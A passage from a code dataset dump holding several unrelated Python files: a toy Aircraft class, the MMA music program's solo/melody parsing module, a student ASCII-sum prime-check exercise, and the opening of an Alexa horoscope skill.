Heads')\npylab.ylabel('Probability')\npylab.show()\n","repo_name":"gfdemelo/data_codes","sub_path":"Scientific_Python_Scipy/chapter_6/P6_7_1.py","file_name":"P6_7_1.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"629693230","text":"class Aircraft:\n __fuel = 0 # private attribute containing current fuel in aircraft\n maxFuel = 24000\n __fuelCheck = False # this is a Boolean flag for a pre-flight check.\n MIN_FUEL = 1000 # minimum amount of fuel for takeoff\n __flightClearance = False\n flightNum = \"\"\n\n def __init__(self, planeType=\"747\"):\n self.planeType = planeType\n\n def setFlightNum(self, flightNum):\n self.flightNum = flightNum\n\n def fuelCheck(self):\n if self.__fuel < self.MIN_FUEL:\n print(\"Fuel Check Failed: Current fuel below safe limit:\", self.__fuel,\n \" less than \", self.MIN_FUEL)\n self.__fuelCheck = False\n else:\n print(\"Fuel Check Complete:\", self.__fuel)\n self.__fuelCheck = True\n\n def takeOff(self):\n if self.__fuelCheck == True:\n print(\"Cleared for Takeoff! Fasten your seat-belt!\")\n else:\n print(\"Take off Failed: Please complete pre-flight check first\")\n print(self.fuelCheck())\n\n def printStatus(self):\n print(\"Current fuel:\", self.__fuel)\n\n def addFuel(self, volume):\n unusedFuel = 0\n\n if volume < 0:\n print(\"No syphoning fuel!\")\n elif self.__fuel + volume <= self.maxFuel:\n self.__fuel = self.__fuel + volume\n elif self.__fuel + volume > self.maxFuel:\n self.__fuel = self.maxFuel\n unusedFuel = volume - self.__fuel\n\n return unusedFuel\n\n def preFlightCheck(self):\n if self.__fuelCheck == False:\n self.__flightClearance = False\n print(\"DANGER!! DO NOT TAKE OFF!. You are not authorized for clearance!\")\n\n else:\n self.__flightClearance = True\n print(\"Clearance authorized. You can proceed!\")\n self.takeOff()\n","repo_name":"ConorMB93/Python1","sub_path":"Aircraft.py","file_name":"Aircraft.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37482174058","text":"# patSolo.py\n\n\"\"\"\nThis module is an integeral part of the program\nMMA - Musical Midi Accompaniment.\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\nBob van der Poel \n\n\"\"\"\n\nimport MMA.notelen\nimport MMA.translate\nimport MMA.harmony\nimport MMA.volume\nimport MMA.alloc\nimport MMA.swing\nimport MMA.truncate\n\nfrom . import gbl\n\nfrom MMA.common import *\nfrom MMA.pat import PC, Pgroup\nfrom MMA.keysig import keySig\nimport MMA.debug\n\nimport re\nimport random\n\n\n# Each note in a solo gets a NoteEvent.\nclass NoteEvent:\n def __init__(self, pitch, velocity, isgrace):\n self.duration = None\n self.pitch = pitch\n self.articulation = None\n self.velocity = velocity\n self.defvelocity = velocity\n self.isgrace = isgrace # signal grace note, no harmony and change offset\n\naccValues = {'#': 1, \"&\": -1, 'n': 0}\n\n# used when extracting solo notes.\ndefaultVelocity = 90\n\n##############################\n\n\nclass Melody(PC):\n \"\"\" The melody and solo tracks are identical, expect that\n the solo tracks DO NOT get saved in grooves and are only\n initialized once.\n \"\"\"\n\n vtype = 'MELODY'\n drumType = None\n\n endTilde = []\n drumTone = 38\n arpRate = 0\n arpDecay = 0\n arpDirection = 'UP'\n stretch = 1\n followChord = 0\n followKey = 1\n rootChord = 0 # start off with a C chord as default\n\n def __init__(self, ln):\n \"\"\" We need special init here incase this is converted to drumType.\n If we don't have a toneList, we're screwed.\n \"\"\"\n\n self.toneList = [self.drumTone]\n PC.__init__(self, ln) # This order is important!\n\n def setDrumType(self):\n \"\"\" Set this track to be a drum track. \"\"\"\n\n if self.channel:\n error(\"You cannot change a track to DRUM once it has been used\")\n\n self.drumType = 1\n self.setChannel('10') # MMA assumes all drums are on channel 10\n self.voice = seqBump([MMA.pat.defaultDrum])\n \n def setVoicing(self, ln):\n \"\"\" Set the voicing option for a solo/melody track. Only permitted\n option is FOLLOWCHORD.\n \"\"\"\n\n notopt, ln = opt2pair(ln, toupper=True)\n\n if notopt:\n error(\"Voicing %s: Each option must be a OPT=VALUE pair.\" % self.name)\n\n for opt, val in ln:\n if opt == 'FOLLOWCHORD':\n if val in ('0', 'OFF'):\n val = None\n elif val in ('1', 'ON'):\n val = 1\n else:\n error(\"%s Voicing FollowChord: expecting On or Off.\" % self.name)\n self.followChord = val\n\n elif opt == 'FOLLOWKEY':\n if val in ('0', 'OFF'):\n val = None\n elif val in ('1', 'ON'):\n val = 1\n else:\n error(\"%s Voicing FollowKey: expecting On or Off.\" % self.name)\n\n self.followKey = val\n\n elif opt == 'ROOT':\n try:\n self.rootChord = MMA.chords.cdAdjust[val.upper()]\n except KeyError:\n error(\"Voicing %s: Chord name %s not valid.\" % (self.name, val))\n\n else:\n error(\"Voicing %s: Only valid options are 'FollowChord', 'FollowKey' and 'Root'.\"\n % self.name)\n\n def formatPattern(self, pat):\n \"\"\" Format an existing pattern. Overrides class def! \"\"\"\n\n if not pat:\n return ''\n else:\n return pat\n\n def saveGroove(self, gname):\n \"\"\" Save special/local variables for groove. \"\"\"\n\n PC.saveGroove(self, gname) # create storage. Do this 1st.\n self.grooves[gname]['FOLLOWCHORD'] = self.followChord\n self.grooves[gname]['FOLLOWKEY'] = self.followKey\n self.grooves[gname]['ROOT'] = self.rootChord\n self.grooves[gname]['TONES'] = self.toneList[:]\n\n def restoreGroove(self, gname):\n \"\"\" Restore special/local/variables for groove. \"\"\"\n\n self.followChord = self.grooves[gname]['FOLLOWCHORD']\n self.followKey = self.grooves[gname]['FOLLOWKEY']\n self.rootChord = self.grooves[gname]['ROOT']\n self.toneList = self.grooves[gname]['TONES']\n PC.restoreGroove(self, gname)\n\n def setSeqSize(self):\n \"\"\" Expand existing pattern list. \"\"\"\n\n self.toneList = seqBump(self.toneList)\n PC.setSeqSize(self)\n\n def clearSequence(self):\n \"\"\" Set some initial values. Called from init and clear seq. \"\"\"\n\n PC.clearSequence(self)\n self.toneList = seqBump([self.drumTone])\n\n def defPatRiff(self, ln):\n \"\"\" Create a solo pattern. This is used for solo sequenes only.\n\n All we do is to return the string set as a pattern. Pretty simple.\n\n \"\"\"\n\n return ln\n\n def setStretch(self, ln):\n \"\"\" Set a stretch (or compress) value for each note set in a solo. \"\"\"\n\n s = stof(ln[0])\n\n if s < 1 or s > 500:\n error(\"%s Stretch: value must be a percentage in range 1 to 500, not '%s'\"\n % (self.name, s))\n\n self.stretch = s / 100.\n\n def setArp(self, ln):\n \"\"\" Set the arpeggiate options. \"\"\"\n\n if len(ln)==1 and ln[0].upper()=='OFF':\n ln[0] = \"Rate=0\"\n \n notopt, ln = opt2pair(ln, 1)\n\n if notopt:\n error(\"%s Arpeggiate: expecting cmd=opt pairs, not '%s'.\"\n % (self.name, ' '.join(notopt)))\n\n for cmd, opt in ln:\n if cmd == 'RATE':\n if opt == '0' or opt == 'NONE':\n self.arpRate = 0\n else:\n self.arpRate = self.getNoteLen(opt)\n\n elif cmd == 'DECAY':\n v = stof(opt, \"Arpeggiate Decay must be a value, not '%s'\" % opt)\n if v < -50 or v > 50:\n error(\"%s Arpeggiate: Decay rate must be -50..+50\" %\n self.name)\n self.arpDecay = v / 100\n\n elif cmd == 'DIRECTION':\n valid = (\"UP\", \"DOWN\", \"BOTH\", \"RANDOM\")\n if opt not in valid:\n error(\"%s Arpeggiate Direction: Unknown setting '%s', use %s.\"\n % (self.name, opt, ', '.join(valid)))\n self.arpDirection = opt\n\n if MMA.debug.debug:\n dPrint(\"%s Arpeggiate: Rate=%s Decay=%s Direction=%s\" % \n (self.name, self.arpRate, self.arpDecay, self.arpDirection))\n\n def getNoteLen(self, n):\n \"\"\" This is a special interface to MMA.notelen.getNoteLen() which\n adjusts the length (in MIDI ticks) by the \"stetch\" value for\n this class.\n \"\"\"\n\n return MMA.notelen.getNoteLen(n) * self.stretch\n\n def restart(self):\n self.ssvoice = -1\n\n def setTone(self, ln):\n \"\"\" A solo track can have a tone, if it is DRUMTYPE.\"\"\"\n\n if not self.drumType:\n error(\"You must set a Solo track to DrumType before setting Tone\")\n\n if len(ln) > 1:\n error(\"Only 1 value permitted for Drum Tone in Solo tracks\")\n\n self.drumTone = MMA.translate.dtable.get(ln[0])\n\n def getChord(self, c, velocity, isdrum, isgrace):\n \"\"\" Extract a set of notes for a single beat.\n\n This is a function just to make getLine() a bit shorter\n and more readble.\n \"\"\"\n\n c = re.split(\"[, ]+\", c)\n\n if not c:\n error(\"You must specify the first note in a solo line\")\n\n \"\"\" Convert the note part into a series of midi values\n Notes can be a single note, or a series of notes. And\n each note can be a letter a-g (or r), a '#,&,n' plus\n a series of '+'s or '-'s. Drum solos must have each\n note separated by ' ' or ','s: \"Snare1,KickDrum1,44\".\n\n Each chunk could be:\n - a midi value (44)\n - a drum note ( KickDrum1)\n - a single note (g#) (g&-)\n - Or groups with spaces/commas (f 100) (44 , KickDrum) (a,b c)\n \"\"\"\n\n events = [] # array for each note event\n\n for cc in c:\n if not cc or not cc[0]:\n continue\n if '/' in cc:\n if cc.count('/') > 1:\n error(\"%s: Only 1 '/velocity' permitted. You can separate \"\n \"notes in the chord with ',' or ' ' and it'll work.\" %\n self.name)\n cc, newvel = cc.split('/')\n if not newvel:\n error(\"%s: expecting 'volume' after '/'\" % self.name)\n\n if not cc:\n error(\"%s: Volume '/' must immediately follow note.\" % self.name)\n\n thisvel = stoi(newvel)\n\n if thisvel < 0 or thisvel > 127:\n error(\"%s: Velocity must be 0..127, not '%s'.\" % (self.name, newvel))\n else:\n thisvel = velocity\n\n if cc[0] == 'r':\n if isgrace:\n warning(\"%s: Grace note is a rest (ignored).\" % self.name)\n\n if events or len(cc) > 1:\n error(\"%s: Rests and notes cannot be combined.\" % self.name)\n else:\n events.append(NoteEvent(None, 0, isgrace)) # note event with no pitch\n\n elif cc[0] in \"1234567890\":\n n = stoi(cc, \"%s: Note values must be integer or literal.\" %\n self.name)\n if n < 0 or n > 127:\n error(\"%s: Midi notes must be 0..127, not '%s'\" %\n (self.name, n))\n\n # if using value we fake-adjust octave,\n # it (and transpose) is set later.\n\n if not isdrum:\n n -= self.octave[self.seq]\n\n events.append(NoteEvent(n, thisvel, isgrace))\n\n elif isdrum: # drum must be a value, * or drum-name\n if cc == '*':\n events.append(NoteEvent(self.drumTone, thisvel, isgrace))\n else:\n events.append(NoteEvent(int(MMA.translate.dtable.get(cc)), thisvel, isgrace))\n\n else: # must be a note(s) in std. notation\n cc = list(cc)\n while cc:\n name = cc.pop(0)\n\n if not name in self.midiNotes:\n error(\"%s: Encountered illegal note name '%s'\"\n % (self.name, name))\n\n n = self.midiNotes[name] # name is string, n is value\n\n # Parse out a \"#', '&' or 'n' accidental.\n\n if cc and cc[0] in accValues:\n i = cc.pop(0)\n self.acc[name] = accValues[i]\n\n n += self.acc[name] # accidental adjust (from above or keysig)\n\n # Parse out +/- (or series) for octave\n\n while cc and cc[0] in '+-':\n a = cc.pop(0)\n if a == '+':\n n += 12\n else:\n n -= 12\n\n events.append(NoteEvent(n, thisvel, isgrace))\n\n return events\n\n def getLine(self, pat):\n \"\"\" Extract a melodyline for solo/melody tracks.\n\n This is only called from trackbar(), but it's nicer\n to isolate it here.\n\n\n RETURNS: notes structure. This is a dictionary. Each key represents\n an offset in MIDI ticks in the current bar. The data for\n each entry is an array of note events:\n\n notes[offset] - [nev [,...] ] See top of file for noteEvent()\n class which sets the fields.\n \"\"\"\n\n sc = self.seq\n\n \"\"\" Get a COPY of the keysignature note table (a dict).\n As a bar is processed the table is updated. There is one difference\n here---in real music an accidental for a note in a given octave does\n not effect the following same-named notes in different octaves.\n In this routine IT DOES.\n\n FollowKey=Off is usually (user) set when using a sequence pattern.\n \"\"\"\n\n if self.followKey: # this is the default\n self.acc = keySig.accList.copy()\n else: # disable the feature. Useful for sequence patterns!\n self.acc = {'a': 0, 'c': 0, 'b': 0, 'e': 0, 'd': 0, 'g': 0, 'f': 0}\n\n # list of notename to midivalues\n\n self.midiNotes = {'c': 0, 'd': 2, 'e': 4, 'f': 5, 'g': 7, 'a': 9, 'b': 11, 'r': None}\n\n \"\"\" The initial string is in the format \"1ab;4c;;4r;\". The trailing\n ';' is important and needed. If we don't have this requirement\n we can't tell if the last note is a repeat of the previous. For\n example, if we have coded \"2a;2a;\" as \"2a;;\" and we didn't\n have the 'must end with ;' rule, we end up with \"2a;\" and\n then we make this into 2 notes...or do we? Easiest just to\n insist that all bars end with a \";\".\n \"\"\"\n\n if not pat.endswith(';'):\n error(\"All Solo strings must end with a ';'\")\n\n # Get the end of the bar in ticks. If we're doing a truncate\n # use the temporary bar length, otherwise figure it out.\n\n if MMA.truncate.length:\n barEnd = MMA.truncate.length\n else:\n barEnd = gbl.barLen\n\n duration = self.getNoteLen('4') # default note length\n velocity = defaultVelocity # intial/default velocity for solo notes\n articulation = 1 # additional articulation for solo notes\n\n notes = {} # NoteEvent list, keys == offset\n\n if self.drumType:\n isdrum = 1\n lastc = str(self.drumTone)\n else:\n isdrum = None\n lastc = '' # last parsed note\n\n # convert pat to a list\n pat = [x.strip() for x in pat.split(';')[:-1]]\n\n # set initial offset into bar. This compensates for the previous\n # bar ending in a ~ and this one starting with ~.\n # This special case bumps the initial bar offset\n\n if pat[0].startswith(\"~\"):\n if not self.endTilde or self.endTilde[1] != gbl.tickOffset:\n error(\"Previous line did not end with '~'\")\n else:\n pat[0] = pat[0][1:].strip()\n offset = self.endTilde[0]\n else:\n offset = 0\n\n lastOffset = None\n\n # Strip off trailing ~. This permits long notes to end past the\n # current barend. Note, flag set for the next bar to test for\n # a leading ~.\n\n if pat[-1].endswith(\"~\"):\n self.endTilde = [1, gbl.tickOffset + barEnd]\n pat[-1] = pat[-1][:-1].strip()\n else:\n self.endTilde = []\n\n ##################################################\n # Now we can parse each chunk of the solo string.\n\n for a in pat:\n \"\"\" If we find a \"<>\" we just ignore that. It's useful when\n multiple continuation bars are needed with ~.\n \"\"\"\n\n accentVol = None\n accentDur = None\n isgrace = False\n\n if a == '<>':\n continue\n\n \"\"\" Next, strip out all '' settings.\n\n VOLUME: If no option is set, we assume VOLUME. The default\n velocity setting was set before the loop (==90) and is\n changed here for the duration of the current bar/riff.\n The set velocity will still be modified by the global\n and track volume adjustments.\n\n DURATION: Duration or articulation setting is defaulted to 100.\n Changing it here will do so for the duration of the\n bar/riff. Note, the track ARTICULATION is still applied.\n\n ISGRACE: grace note indication and offset. Offset is optional.\n\n OFFSET: change the current offset into the bar. Can be negative\n which forces overlapping notes.\n\n \"\"\"\n\n a, vls = pextract(a, \"<\", \">\")\n\n if vls:\n if len(vls) > 1:\n error(\"Only 1 is permitted per note-set\")\n\n vls = vls[0].split(',')\n for vv in vls:\n\n vv = vv.upper().strip()\n\n # We have an default offset for grace notes of 2.\n # So, if what have a GRACE without a offset, convert\n # the command to that.\n if vv == 'GRACE':\n vv = 'GRACE=2'\n\n if not '=' in vv:\n vv = \"VOLUME=\" + vv\n\n vc, vo = vv.split('=', 1) # note: it's already uppercase!\n\n if vc == 'VOLUME':\n if vo in MMA.volume.vols: # arg was a volume 'FF, 'mp', etc.\n velocity = defaultVelocity * MMA.volume.vols[vo]\n else:\n error(\"%s: No volume '%s'.\" % (self.name, vo))\n\n elif vc == 'GRACE':\n isgrace = stof(vo, \"%s: Expecting a value, not %s.\" % (self.name, vo))\n if isgrace <= 0:\n error(\"%s: Offset modifier must be greater than 0.\"\n % self.name)\n\n elif vc == 'OFFSET':\n offset = stoi(vo, \"%s: Offset expecting integer, not %s.\"\n % (self.name, vo))\n\n if offset < 0:\n error(\"%s: Offset must be positive.\" % self.name)\n\n if offset >= barEnd:\n error(\"%s: Offset has been set past the end of the bar.\"\n % self.name)\n\n elif vc == 'ARTICULATE':\n articulation = stoi(vo, \"%s: Articulation expecting integer,\"\n \" not %s.\" % (self.name, vo))\n\n if articulation < 1 or articulation > 200:\n error(\"%s: Articulation must be 1..200, not %s.\" %\n (self.name, vo))\n articulation /= 100.\n\n else:\n error(\"%s: Unknown command '%s'.\" % (self.name, vv))\n\n if offset >= barEnd:\n error(\"Attempt to start Solo note '%s' after end of bar\" % a)\n\n \"\"\" Split the chord chunk into a note length and notes. Each\n part of this is optional and defaults to the previously\n parsed value.\n \"\"\"\n\n i = 0\n while i < len(a):\n if not a[i] in '1234567890.+-tT:':\n break\n else:\n i += 1\n\n if i:\n duration = self.getNoteLen(a[0:i].replace(' ', ''))\n a = a[i:].strip()\n\n # next item might be an accent string.\n\n i = 0\n while i < len(a):\n if not a[i] in \"!-_^&\":\n break\n else:\n i += 1\n\n if i:\n c = a[0:i]\n accentVol = 1\n accentDur = 1\n\n accentDur -= c.count('!') * .2\n accentDur += c.count('-') * .2\n accentDur += c.count('_') * .2\n accentVol += c.count('^') * .2\n accentVol -= c.count('&') * .2\n\n if accentDur < .1:\n accentDur = .1\n if accentDur > 2:\n accentDur = 2\n if accentVol < .1:\n accentVol = .1\n if accentVol > 2:\n accentVol = 2\n a = a[i:]\n\n # Now we get to look at pitches.\n\n if not a or a == '' or a == ' ':\n a = lastc\n evts = self.getChord(a, velocity, isdrum, isgrace) # get chord\n\n if not evts:\n error(\"No pitches specifed for notes.\")\n\n for e in evts:\n e.velocity = self.adjustVolume(e.defvelocity, offset)\n if accentVol:\n e.velocity *= accentVol\n e.duration = duration\n\n if accentDur:\n e.articulation = articulation * accentDur\n else:\n e.articulation = articulation\n\n lastc = a # save last chord for next loop\n\n # add note event(s) to note{}\n if not offset in notes:\n notes[offset] = []\n notes[offset].extend(evts)\n\n lastOffset = offset\n\n if not e.isgrace:\n offset += duration\n\n if offset <= barEnd:\n if self.endTilde:\n error(\"Tilde at end of bar has no effect\")\n\n else:\n if self.endTilde:\n self.endTilde[0] = offset - barEnd\n else:\n warning(\"%s, end of last note overlaps end of bar by %g \"\n \"beat(s).\" % (self.name, (offset - barEnd) / float(gbl.BperQ)))\n\n if MMA.swing.mode:\n notes = MMA.swing.swingSolo(notes)\n\n \n return notes\n\n def followAdjust(self, notes, ctable):\n \"\"\" Convert pitches to reflect current chord. \"\"\"\n\n sc = self.seq\n\n for offset in notes:\n nn = notes[offset]\n\n if len(nn) == 1 and nn[0].pitch is not None:\n tb = self.getChordInPos(offset, ctable)\n\n if tb.chordZ:\n continue\n\n nn[0].pitch += (tb.chord.rootNote + self.rootChord)\n\n return notes\n\n def addHarmony(self, notes, ctable):\n \"\"\" Add harmony to solo notes. We need to be careful\n since the chords can contain grace and NULL notes.\n \"\"\"\n\n sc = self.seq\n\n harmony = self.harmony[sc]\n harmOnly = self.harmonyOnly[sc]\n\n for offset in notes:\n nn = notes[offset]\n\n pitch = None\n count = 0\n for n in nn:\n if n.isgrace or n.pitch is None:\n continue\n pitch = n.pitch\n duration = n.duration\n articulation = n.articulation\n velocity = n.defvelocity\n count += 1 # signals multiple notes, don't harmonize\n\n if harmOnly:\n n.pitch = None\n\n # The chord might have no notes, have more than one, or be all grace\n if pitch is None or count != 1:\n continue\n\n tb = self.getChordInPos(offset, ctable)\n\n if tb.chordZ:\n continue\n\n h = MMA.harmony.harmonize(harmony, pitch, tb.chord.bnoteList)\n\n for n in h:\n e = NoteEvent(n,\n self.adjustVolume(velocity * self.harmonyVolume[sc], offset),\n False)\n e.duration = duration\n e.articulation = articulation\n nn.append(e)\n\n def trackBar(self, pat, ctable):\n \"\"\" Do the solo/melody line. Called from self.bar() \"\"\"\n\n sc = self.seq\n\n notes = self.getLine(pat)\n\n # adjust all the notes for the given chord if we are in \"FOLLOW CHORD\" mode.\n\n if self.followChord and not self.drumType:\n notes = self.followAdjust(notes, ctable)\n\n if self.harmony[sc] and not self.drumType:\n self.addHarmony(notes, ctable)\n\n unify = self.unify[sc]\n\n rptr = self.mallet\n\n for offset in sorted(notes.keys()):\n nn = notes[offset]\n \n # the \"None\" test is important. Arp doesn't like rests.\n if self.arpRate and nn[0].pitch is not None:\n self.trackArp(nn, offset)\n continue\n\n # For each chord we process 2x. First time finds all the grace\n # notes and sends them to the midi machine; 2nd time normal notes.\n # Has to be done this was so we don't force grace note adjustments\n # (durations) onto normal notes. Grace notes ignore strum!\n\n # grace\n for nev in nn:\n n = nev.pitch\n if n is None or not nev.isgrace: # skip rests and non-grace\n continue\n\n if not self.drumType: # no octave/transpose for drums\n n = self.adjustNote(n)\n\n # Note that each grace note has it's own offset and duration\n self.sendNote(int(offset - (nev.duration // nev.isgrace)),\n self.getDur(int(nev.duration * nev.articulation)),\n n, int(nev.velocity))\n\n # normal notes.\n\n strumAdjust = self.getStrum(sc)\n strumAdd = self.strumAdd[sc]\n strumOffset = 0\n\n dur = None # default duration for notes in chord\n\n for nev in nn:\n n = nev.pitch\n if n is None or nev.isgrace: # skip rests and grace\n continue\n\n if not self.drumType: # no octave/transpose for drums\n n = self.adjustNote(n)\n\n off = offset + strumOffset\n \n # Set duration for this chord. Only do it once so they are\n # all the same length. The call to getDur() adjusts for RDURATION.\n if dur is None:\n dur = self.getDur(int(nev.duration * nev.articulation))\n\n self.sendNote(off, dur, n, int(nev.velocity))\n\n strumAdjust += strumAdd\n strumOffset += strumAdjust\n\n def trackArp(self, nn, offset):\n \"\"\" Special trackbar() for arpeggiator. \"\"\"\n\n if self.drumType:\n error(\"%s Arpeggiate: Incompatible with DRUMTYPE. Try MALLET?\" % self.name)\n\n notes = [[self.adjustNote(x.pitch), x.velocity] for x in nn]\n notes.sort()\n\n random = self.direction == 'RANDOM'\n\n if self.arpDirection == \"DOWN\":\n notes.reverse()\n\n elif self.arpDirection == \"BOTH\":\n z = notes[:]\n z.reverse()\n notes.extend(z[1:-1])\n\n duration = self.arpRate # duration of each note\n count = nn[0].duration // duration # total number to play\n if count < 1:\n count = 1\n\n while 1:\n nn = range(len(notes))\n if random:\n random.randomize(nn)\n for i in nn:\n n = notes[i]\n\n self.sendNote(offset,\n self.getDur(duration), n[0],\n self.adjustVolume(n[1], offset))\n count -= 1\n if not count:\n break\n\n offset += duration\n\n if self.arpDecay:\n n[1] = int(n[1] + (n[1] * self.arpDecay))\n if n[1] < 1:\n n[1] = 1\n if n[1] > 127:\n n[1] = 127\n\n if not count:\n break\n\n\nclass Solo(Melody):\n \"\"\" Pattern class for a solo track. \"\"\"\n\n vtype = 'SOLO'\n\n # Grooves are not saved/restored for solo tracks.\n\n def restoreGroove(self, gname):\n self.setSeqSize()\n\n def saveGroove(self, gname):\n pass\n\n def forceRestoreGroove(self, gname):\n PC.restoreGroove(self, gname)\n\n def forceSaveGroove(self, gname):\n PC.saveGroove(self, gname)\n\n#######################\n\n\"\"\" When solos are included in a chord/data line they are\n assigned to the tracks listed in this list. Users can\n change the tracks with the setAutoSolo command.\n\"\"\"\n\nautoSoloTracks = ['SOLO', 'SOLO-1', 'SOLO-2', 'SOLO-3']\n\n\ndef setAutoSolo(ln):\n \"\"\" Set the order and names of tracks to use when assigning\n automatic solos (specified on chord lines in {}s).\n \"\"\"\n\n global autoSoloTracks\n\n if not len(ln):\n error(\"You must specify at least one track for autosolos\")\n\n autoSoloTracks = []\n for n in ln:\n n = n.upper()\n MMA.alloc.trackAlloc(n, 1)\n if gbl.tnames[n].vtype not in ('MELODY', 'SOLO'):\n error(\"All autotracks must be Melody or Solo tracks, not %s\"\n % gbl.tnames[n].vtype)\n\n autoSoloTracks.append(n)\n\n if MMA.debug.debug:\n dPrint(\"AutoSolo track names: %s\" % ' '.join([a for a in autoSoloTracks]))\n\n\n###############\n\ndef extractSolo(ln, rptcount):\n \"\"\" Parser calls this to extract solo strings. \"\"\"\n\n a = ln.count('{')\n b = ln.count('}')\n\n if a != b:\n error(\"Mismatched {}s for solo found in chord line\")\n\n if a:\n if rptcount > 1:\n error(\"Bars with both repeat count and solos are not permitted\")\n\n ln, solo = pextract(ln, '{', '}')\n\n if len(solo) > len(autoSoloTracks):\n error(\"Too many melody/solo riffs in chord line. %s used, \"\n \"only %s defined\" % (len(solo), len(autoSoloTracks)))\n\n firstSolo = solo[0][:] # save for autoharmony tracks\n\n \"\"\" We have the solo information. Now we loop though each \"solo\" and:\n 1. Ensure or Create a MMA track for the solo\n 2. Push the solo data into a Riff for the given track.\n \"\"\"\n\n for s, trk in zip(solo, autoSoloTracks):\n if not s:\n continue # skip placeholder/empty tracks\n MMA.alloc.trackAlloc(trk, 1)\n t = gbl.tnames[trk]\n if t.riff:\n error(\"%s: Attempt to add {} solo when the track \"\n \"has pending RIFF data.\" % t.name)\n t.setRiff(s.strip())\n\n \"\"\" After all the solo data is interpreted and sent to the\n correct track, we check any leftover tracks. If any of these\n tracks are empty of data AND are harmonyonly the note\n data from the first track is interpeted again for that\n track. Tricky: the max() is needed since harmonyonly can\n have different setting for each bar...this way\n the copy is done if ANY bar in the seq has harmonyonly set.\n \"\"\"\n\n for t in autoSoloTracks[1:]:\n if t in gbl.tnames and not gbl.tnames[t].riff \\\n and set(gbl.tnames[t].harmonyOnly) != {None}:\n gbl.tnames[t].setRiff(firstSolo[:])\n\n if MMA.debug.debug:\n dPrint(\"%s duplicated to %s for HarmonyOnly.\" % (trk, t))\n\n return ln\n","repo_name":"infojunkie/mma","sub_path":"MMA/patSolo.py","file_name":"patSolo.py","file_ext":"py","file_size_in_byte":31545,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"33978419612","text":"# Άσκηση 4:\r\n# Γράψτε μια συνάρτηση η οποία μετατρέπει ένα string σε αριθμό \r\n# σύμφωνα με την αναπαράσταση των αριθμών σε ASCII code και \r\n# μετά ελέγχει αν ο αριθμός είναι πρώτος. Για τον έλεγχο αν ένας \r\n# αριθμός είναι πρώτος ΔΕΝ μπορείτε να χρησιμοποιήσετε εξωτερική βιβλιοθήκη.\r\n# Βήματα:\r\n# 1)Για κάθε γράμμα που δινει ο χρήστης το σπάω σε χαρακτήρες και ταυτόχρονα βάζω \r\n# σε λίστα numbersFromWords[] το ascii αριθμό του με την ord(letters)\r\n# 2)Για κάθε αριθμό στην λίστα μου τον προσθέτω σε μία μεταβλητή Sum οπου κρατάω το σύνολο\r\n# 3)Για να είναι ένας αριθμός πρώτος πρεπει να διαιρείτε με τον αυτό του και το 1 μόνο\r\n# 4)Το ελέγχω και εκτυπώνω ανάλογο μύνημα\r\n\r\n\r\nword = input()\r\n\r\nnumbersFromWords = []\r\nlist(word)\r\nsum = 0\r\n#pairnw kathe gramma kai to kanw arithmo\r\n\r\nfor letter in word:\r\n numbersFromWords.append(ord(letter))\r\n\r\nfor number in numbersFromWords:\r\n sum += number\r\n\r\n#to / gyrnaei float opote // gia na gyrisei int\r\nfor i in range (2, sum//2):\r\n if (sum % i) == 0:\r\n print(sum, \"is not prime\")\r\n break\r\n else:\r\n print(sum, \"is a prime number\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tsatsaris/PythonScriptsJanuary2020","sub_path":"Αskhsh4.py","file_name":"Αskhsh4.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37341672740","text":"from __future__ import print_function\n\nimport random\n# ------------------------------------------------------------------------------\n# ---------------------------- Main Handler ------------------------------------\n# ------------------------------------------------------------------------------\n\ndef lambda_handler(event, context):\n \"\"\" \n This is the Main Handler function that will call other functions.\n We get two inputs : event , context\n \"\"\"\n \n if event['request']['type'] == \"LaunchRequest\":\n return onLaunch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return onIntent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return onSessionEnd(event['request'], event['session'])\n \n# ------------------------------------------------------------------------------\n# ----------------------------- Event Handlers ---------------------------------\n# ------------------------------------------------------------------------------\n\ndef onLaunch(launchRequest, session):\n \"\"\"\n This function welcomes the user , if the person does not Know how to \n interact with the Skill \n \"\"\"\n \n return welcomeGuest()\n \n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\ndef onIntent(intentRequest, session):\n \n intent = intentRequest['intent']\n intentName = intentRequest['intent']['name']\n\n if intentName == \"WhatIsMyZodiac\":\n return set_zodiac(intent, session)\n elif intentName ==\"ZodiacInformation\":\n return zodiac_information(intent,session)\n elif intentName == \"AMAZON.HelpIntent\":\n return welcomeGuest()\n elif intentName == \"AMAZON.CancelIntent\" or intentName == \"AMAZON.StopIntent\":\n return handleSessionEndRequest()\n else:\n raise ValueError(\"Invalid intent\")\n \n\ndef onSessionEnd(sessionEndedRequest, session):\n \"\"\" \n Called when the user ends the session.\n \"\"\"\n print(\"on_session_ended requestId=\" + sessionEndedRequest['requestId'] + \", sessionId=\" + session['sessionId'])\n \n \n# ------------------------------------------------------------------------------\n# --------------------------- Behaviour Handlers -------------------------------\n# ------------------------------------------------------------------------------\n\ndef welcomeGuest():\n \"\"\"\n Giving Welcome Instructions to User\n \"\"\"\n \n sessionAttributes = {}\n cardTitle = \"Welcome Information\"\n speechOutput = \"Welcome to Horoscope 3.1, \" \\\n \"tell me your date of birth, \" \\\n \"for example: three december. \"\n repromptText = \"tell me your date of birth, \" \\\n \"for example: three december. \"\n shouldEndSession = False\n \n return 